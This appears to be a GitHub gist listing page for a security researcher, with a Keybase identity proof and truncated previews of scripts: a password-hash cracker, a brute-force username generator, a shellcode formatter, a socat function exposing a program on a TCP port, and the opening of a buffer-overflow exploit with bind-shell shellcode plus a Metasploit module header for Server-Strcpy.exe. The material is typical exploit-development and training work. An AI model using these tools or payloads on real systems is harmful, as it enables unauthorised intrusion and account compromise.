I hereby claim:
- I am superkojiman on github.
- I am superkojiman (https://keybase.io/superkojiman) on keybase.
- I have a public key ASByWRYpDv1SBppt6tEbHXoMuIsNfMUaa2R6Co4tPLpuLgo
To claim this, I am signing this object:
| #!/usr/bin/env python | |
| import getopt | |
| import urllib | |
| import socket | |
| def usage(name): | |
| print 'Usage: %s -i IP' % name | |
| print 'Usage: %s -h hostname' % name | |
| def main(argv=sys.argv): |
| #!/usr/bin/env python | |
| import sys | |
| import plistlib | |
| import urllib2 | |
| import re | |
| GENRE_LINE = '<a href="http://www.blogger.com/wiki/Music_genre" title="Music genre">Genres</a>\n' | |
| URL_PREFIX = 'http://en.wikipedia.org/wiki/Special:Search/' | |
| artist_genre = {} |
| #!/usr/bin/env python -Wignore::DeprecationWarning | |
| import sha, base64, traceback, sys | |
| if len(sys.argv) < 3: | |
| print "usage: %s [user_password_list] [wordlist]" % (sys.argv[0]) | |
| sys.exit(0) | |
| try: | |
| for line in open(sys.argv[1], "r"): | |
| a = line.strip().split(":") |
| #!/usr/bin/env python3 | |
| ''' | |
| NameMash by superkojiman | |
| Generate a list of possible usernames from a person's first and last name. | |
| https://blog.techorganic.com/2011/07/17/creating-a-user-name-list-for-brute-force-attacks/ | |
| ''' |
| #!/usr/bin/env python | |
| import sys | |
| if __name__ == "__main__": | |
| if len(sys.argv) < 2: | |
| print "usage: %s file.bin\n" % (sys.argv[0],) | |
| sys.exit(0) | |
| shellcode = "\"" | |
| ctr = 1 | |
| maxlen = 15 |
I hereby claim:
To claim this, I am signing this object:
This repository contains the binaries used in my 64-bit ROP Primer writeup.
| # Add to .bashrc | |
| # You're welcome | |
| function soocat { | |
| socat tcp-l:${2},reuseaddr,fork EXEC:${1} | |
| } |
| #!/usr/bin/env python | |
| # Server-Strcpy.exe exploit by superkojiman | |
| # http://blog.techorganic.com | |
| import socket, sys | |
| def main(target, port): | |
| # 368 bytes, opens a bind TCP shell on port 4444 | |
| shellcode = ( | |
| "\xd9\xcc\xd9\x74\x24\xf4\x5b\xba\x69\xe4\x4d\x67\x33\xc9" + |
| # Server-Strcpy.exe exploit by superkojiman | |
| # http://blog.techorganic.com | |
| require 'msf/core' | |
| class Metasploit3 < Msf::Exploit::Remote | |
| Rank = AverageRanking | |
| include Msf::Exploit::Remote::Tcp |